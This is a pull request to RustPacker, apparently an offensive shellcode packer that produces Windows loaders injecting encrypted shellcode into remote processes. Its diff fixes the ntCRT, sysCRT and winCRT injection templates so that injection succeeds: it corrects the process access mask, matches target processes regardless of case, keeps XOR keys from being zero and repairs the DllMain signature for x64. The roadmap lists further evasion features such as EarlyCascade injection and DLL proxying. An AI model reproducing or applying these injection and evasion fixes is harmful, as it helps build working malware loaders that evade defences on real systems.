### PR TITLE
fix: multiple template bugs and improvements

### DIFF
--- a/README.md
+++ b/README.md
@@ -140,15 +140,6 @@ podman run --rm -v %cd%/shared:/usr/src/RustPacker/shared:z rustpacker RustPacke
   -f shared/payload.raw -i ntcrt -e aes -b exe -t notepad.exe
 ```
 
-### Troubleshooting (Windows)
-
-| Issue | Solution |
-|-------|----------|
-| `podman: command not found` | Ensure Podman Desktop is running and `podman` is in your PATH |
-| `docker: command not found` | Ensure Docker Desktop is running |
-| Container build fails | Check that your container runtime's VM/WSL is started |
-| Permission errors on volume mounts | Run your terminal as Administrator, or check Docker Desktop file sharing settings |
-
 ## 📖 Command Line Options
 
 ```
@@ -222,7 +213,7 @@ rustpacker -f shared/payload.raw -i ntcrt -e aes -b exe -o shared/my_binary.exe
 
 ### Process Injection Templates
 
-These templates inject shellcode into a remote process. Use `-t <process_name>` to specify the target (default: `dllhost.exe`). The target process name is **case sensitive**.
+These templates inject shellcode into a remote process. Use `-t <process_name>` to specify the target (default: `dllhost.exe`).
 
 | Template | API Level | Indirect Syscalls | Dynamic API | Description |
 |----------|-----------|:-----------------:|:-----------:|-------------|
@@ -320,8 +311,9 @@ Contributions are welcome! Here's how you can help:
 - [x] Indirect syscalls for fiber templates
 - [x] Cross-platform support (Linux, Windows, macOS)
 - [ ] String encryption (litcrypt)
-- [ ] Binary signing support
-- [ ] Mutex/Semaphore support
+- [ ] Check DLL support for all templates
+- [ ] Add EarlyCascade injection template
+- [ ] Add DLL proxying support
 
 ## 🙏 Acknowledgments
 

--- a/src/puzzle.rs
+++ b/src/puzzle.rs
@@ -92,7 +92,7 @@ fn build_encrypted_output(order: &Order, src_dir: &Path) -> (EncryptionOutput, S
     let include_path = format!("\"{}\"", filename);
 
     let output = match order.encryption {
-        Encryption::Xor => encrypt_xor(&order.shellcode_path, &path, random_u8()),
+        Encryption::Xor => encrypt_xor(&order.shellcode_path, &path, non_zero_random_key()),
         Encryption::Aes => {
             encrypt_aes(&order.shellcode_path, &path, &random_aes_key(), &random_aes_iv())
         }
@@ -147,10 +147,13 @@ fn apply_dll_format(
     replacements.insert("{{DLL_FORMAT}}", dll_cargo_conf.to_string());
 
     let dll_main_fn = r#"
+    const DLL_PROCESS_ATTACH: u32 = 1;
+    const DLL_PROCESS_DETACH: u32 = 0;
+
     #[no_mangle]
     #[allow(non_snake_case, unused_variables, unreachable_patterns)]
     extern "system" fn DllMain(
-        dll_module: u32,
+        dll_module: usize,
         call_reason: u32,
         _: *mut ())
         -> bool

--- a/src/tools.rs
+++ b/src/tools.rs
@@ -152,10 +152,14 @@ mod tests {
 
     #[test]
     fn test_absolute_path_already_absolute() {
-        let path = Path::new("/tmp/test");
+        let path = if cfg!(windows) {
+            Path::new("C:\\tmp\\test")
+        } else {
+            Path::new("/tmp/test")
+        };
         let result = absolute_path(path).unwrap();
         assert!(result.is_absolute());
-        assert_eq!(result, Path::new("/tmp/test"));
+        assert_eq!(result, path);
     }
 
     #[test]

--- a/templates/ntCRT/Cargo.toml
+++ b/templates/ntCRT/Cargo.toml
@@ -9,7 +9,7 @@ edition = "2021"
 
 [dependencies]
 sysinfo = "0.38"
-winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "lmaccess", "libloaderapi"] }
+winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "libloaderapi", "winnt"] }
 {{DEPENDENCIES}}
 
 [profile.release]

--- a/templates/ntCRT/src/main.rs
+++ b/templates/ntCRT/src/main.rs
@@ -2,14 +2,13 @@
 #![allow(non_snake_case)]
 
 use sysinfo::System;
-use std::ffi::{CString, OsStr};
+use std::ffi::CString;
 use std::include_bytes;
 use std::ptr::null_mut;
 
 use winapi::{
     um::{
-        winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PAGE_EXECUTE_READ, THREAD_ALL_ACCESS},
-        lmaccess::ACCESS_ALL,
+        winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PAGE_EXECUTE_READ, THREAD_ALL_ACCESS, PROCESS_ALL_ACCESS},
         libloaderapi::{GetModuleHandleA, GetProcAddress},
     },
     shared::{
@@ -63,8 +62,11 @@ type FH = unsafe extern "system" fn(u32, *const i64) -> i32;
 fn boxboxbox(tar: &str) -> Vec<usize> {
     let mut dom: Vec<usize> = Vec::new();
     let s = System::new_all();
-    for pro in s.processes_by_exact_name(OsStr::new(tar)) {
-        dom.push(usize::try_from(pro.pid().as_u32()).unwrap());
+    let tar_lower = tar.to_lowercase();
+    for (_, pro) in s.processes() {
+        if pro.name().to_string_lossy().to_lowercase() == tar_lower {
+            dom.push(usize::try_from(pro.pid().as_u32()).unwrap());
+        }
     }
     dom
 }
@@ -105,7 +107,7 @@ fn enhance(mut buf: Vec<u8>, tar: usize) {
         let f_protect: FD = std::mem::transmute(g(OBF_D));
         let f_thread: FE = std::mem::transmute(g(OBF_E));
 
-        let s = f_open(&mut process_handle, ACCESS_ALL, &mut oa, &mut ci);
+        let s = f_open(&mut process_handle, PROCESS_ALL_ACCESS, &mut oa, &mut ci);
         if !NT_SUCCESS(s) { return; }
 
         pause(150);

--- a/templates/sysCRT/Cargo.toml
+++ b/templates/sysCRT/Cargo.toml
@@ -11,7 +11,7 @@ edition = "2021"
 rust_syscalls = { git = "https://github.com/Nariod/rust_syscalls",  features = ["_INDIRECT_"] }
 sysinfo = "0.38"
 ntapi = { version = "0.4", features = ["impl-default"] }
-winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "lmaccess"] }
+winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "winnt"] }
 {{DEPENDENCIES}}
 
 [profile.release]

--- a/templates/sysCRT/src/main.rs
+++ b/templates/sysCRT/src/main.rs
@@ -2,14 +2,12 @@
 #![allow(non_snake_case)]
 
 use sysinfo::System;
-use std::ffi::OsStr;
 use std::include_bytes;
 use rust_syscalls::syscall;
 
 use winapi::{
     um::{
-        winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE},
-        lmaccess::{ACCESS_ALL}
+        winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PROCESS_ALL_ACCESS}
     },
     shared::{
         ntdef::{OBJECT_ATTRIBUTES, HANDLE, NT_SUCCESS}
@@ -34,8 +32,11 @@ use std::time::Instant;
 fn boxboxbox(tar: &str) -> Vec<usize> {
     let mut dom: Vec<usize> = Vec::new();
     let s = System::new_all();
-    for pro in s.processes_by_exact_name(OsStr::new(tar)) {
-        dom.push(usize::try_from(pro.pid().as_u32()).unwrap());
+    let tar_lower = tar.to_lowercase();
+    for (_, pro) in s.processes() {
+        if pro.name().to_string_lossy().to_lowercase() == tar_lower {
+            dom.push(usize::try_from(pro.pid().as_u32()).unwrap());
+        }
     }
     dom
 }
@@ -69,7 +70,7 @@ fn enhance(mut buf: Vec<u8>, tar: usize) {
     };
 
     unsafe {
-        let s = syscall!("NtOpenProcess", &mut process_handle, ACCESS_ALL, &mut oa, &mut ci);
+        let s = syscall!("NtOpenProcess", &mut process_handle, PROCESS_ALL_ACCESS, &mut oa, &mut ci);
         if !NT_SUCCESS(s) { return; }
 
         pause(150);

--- a/templates/winCRT/src/main.rs
+++ b/templates/winCRT/src/main.rs
@@ -2,7 +2,6 @@
 #![allow(non_snake_case)]
 
 use sysinfo::System;
-use std::ffi::OsStr;
 use windows::Win32::System::Diagnostics::Debug::WriteProcessMemory;
 use windows::Win32::System::Memory::VirtualAllocEx;
 use windows::Win32::System::Memory::VirtualProtectEx;
@@ -23,8 +22,11 @@ use std::thread;
 fn boxboxbox(tar: &str) -> Vec<usize> {
     let mut dom: Vec<usize> = Vec::new();
     let s = System::new_all();
-    for pro in s.processes_by_exact_name(OsStr::new(tar)) {
-        dom.push(usize::try_from(pro.pid().as_u32()).unwrap());
+    let tar_lower = tar.to_lowercase();
+    for (_, pro) in s.processes() {
+        if pro.name().to_string_lossy().to_lowercase() == tar_lower {
+            dom.push(usize::try_from(pro.pid().as_u32()).unwrap());
+        }
     }
     dom
 }


### PR DESCRIPTION
- Fix ACCESS_ALL (0xF) -> PROCESS_ALL_ACCESS (0x1FFFFF) in ntCRT/sysCRT (was missing PROCESS_VM_WRITE/READ bits, causing injection failure)
- Fix XOR key generation to exclude 0 (non_zero_random_key)
- Fix DLL format: add inline DLL_PROCESS_ATTACH/DETACH constants, fix HMODULE parameter type (u32 -> usize) for x64 compatibility
- Fix case-insensitive process name matching in all CRT templates (sysinfo processes_by_exact_name is case-sensitive on Windows)
- Fix test_absolute_path_already_absolute for Windows paths
- Remove obsolete case-sensitivity warning from README
- Update README roadmap items